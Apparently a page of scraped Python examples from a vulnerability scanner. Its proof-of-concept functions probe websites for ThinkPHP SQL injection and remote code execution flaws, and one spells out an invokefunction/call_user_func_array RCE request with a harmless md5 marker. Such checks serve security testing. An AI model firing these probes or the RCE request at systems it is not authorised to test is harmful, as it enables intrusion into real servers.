示例#1
0
async def thinkphp_view_recent_xff_sqli_verify(url):
    pocdict = get_pocdict(vulnname=__name__)
    try:
        vurl = urljoin(url, payload)
        resp = requests.get(vurl, headers=headers, timeout=15, verify=False)
        if '56540676a129760a' in resp.text:
            pocdict['isvul'] = True
            pocdict['vulnurl'] = vurl
            pocdict['proof'] = '56540676a129760a'
            pocdict['response'] = resp.text
    except Exception as e:
        pocdict['exception'] = str(e)
    return pocdict
示例#2
0
async def thinkphp_index_construct_rce_verify(url):
    pocdict = get_pocdict(vulnname=__name__)
    try:
        url = urljoin(url, 'index.php?s=index/index/index')
        resp = requests.post(url, data=payload, headers=headers, timeout=15, verify=False)
        if '4e5e5d7364f443e28fbf0d3ae744a59a' in resp.text:
            pocdict['isvul'] = True
            pocdict['vulnurl'] = url
            pocdict['payload'] = payload
            pocdict['proof'] = '4e5e5d7364f443e28fbf0d3ae744a59a'
            pocdict['response'] = resp.text
    except Exception as e:
        pocdict['exception'] = str(e)
    return pocdict
示例#3
0
async def thinkphp_construct_debug_rce_verify(url):
    pocdict = get_pocdict(vulnname=__name__)
    try:
        url = urljoin(url, 'index.php')
        resp = requests.post(url,
                             data=payload,
                             headers=headers,
                             timeout=15,
                             verify=False)
        if '56540676a129760a3' in resp.text:
            pocdict['isvul'] = True
            pocdict['vulnurl'] = url
            pocdict['payload'] = payload
            pocdict['proof'] = '56540676a129760a3'
            pocdict['response'] = resp.text
    except Exception as e:
        pocdict['exception'] = str(e)
    return pocdict
示例#4
0
async def thinkphp_index_showid_rce_verify(url):
    pocdict = get_pocdict(vulnname=__name__)
    try:
        vurl = urljoin(url, payload1)
        _ = requests.get(vurl, headers=headers, timeout=15, verify=False)
        time_now = datetime.datetime.now().strftime("%Y_%m_%d")[2:]
        resp = requests.get(url=urljoin(url, payload2.format(time_now)),
                            headers=headers,
                            timeout=15,
                            verify=False)
        if '56540676a129760a3' in resp.text:
            pocdict['isvul'] = True
            pocdict['vulnurl'] = vurl
            pocdict['proof'] = '56540676a129760a3 found'
            pocdict['response'] = resp.text
    except Exception as e:
        pocdict['exception'] = str(e)
    return pocdict
示例#5
0
async def thinkphp_multi_sql_leak_verify(url):
    pocdict = get_pocdict(vulnname=__name__)
    results = []
    for payload in payloads:
        try:
            vurl = urljoin(url, payload)
            resp = requests.get(vurl,
                                headers=headers,
                                timeout=15,
                                verify=False)
            if 'SQL syntax' in resp.text:
                pocdict['isvul'] = True
                pocdict['vulnurl'] = vurl
                pocdict['proof'] = 'SQL syntax found'
                pocdict['response'] = resp.text
        except Exception as e:
            pocdict['exception'] = str(e)
        results.append(pocdict)
    return results
async def thinkphp_checkcode_time_sqli_verify(url):
    pocdict = get_pocdict(vulnname=__name__)
    try:
        start_time = time.time()
        url = urljoin(url, 'index.php?s=/home/user/checkcode/')
        resp = requests.post(url,
                             data=payload,
                             headers=headers,
                             timeout=15,
                             verify=False)
        if time.time() - start_time >= 8:
            pocdict['isvul'] = True
            pocdict['vulnurl'] = url
            pocdict['payload'] = payload
            pocdict['proof'] = 'time sleep 8'
            pocdict['response'] = resp.text
    except Exception as e:
        pocdict['exception'] = str(e)
    return pocdict
示例#7
0
async def thinkphp_invoke_func_code_exec_verify(url):
    results, controllers = [], ['index']
    resp = requests.get(url, headers=headers, timeout=15, verify=False)
    matches = re.findall(pattern, resp.text)
    for match in matches:
        controllers.append(match.split('/')[1])
    for controller in set(controllers):
        pocdict = get_pocdict(vulnname=__name__)
        try:
            payload = f'index.php?s={controller}/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=2333'
            vurl = urljoin(url, payload)
            resp = requests.get(vurl, headers=headers, timeout=15, verify=False)
            if '56540676a129760a3' in resp.text:
                pocdict['isvul'] = True
                pocdict['vulnurl'] = vurl
                pocdict['proof'] = '56540676a129760a3'
                pocdict['response'] = resp.text
        except Exception as e:
            pocdict['exception'] = str(e)
        results.append(pocdict)
    return results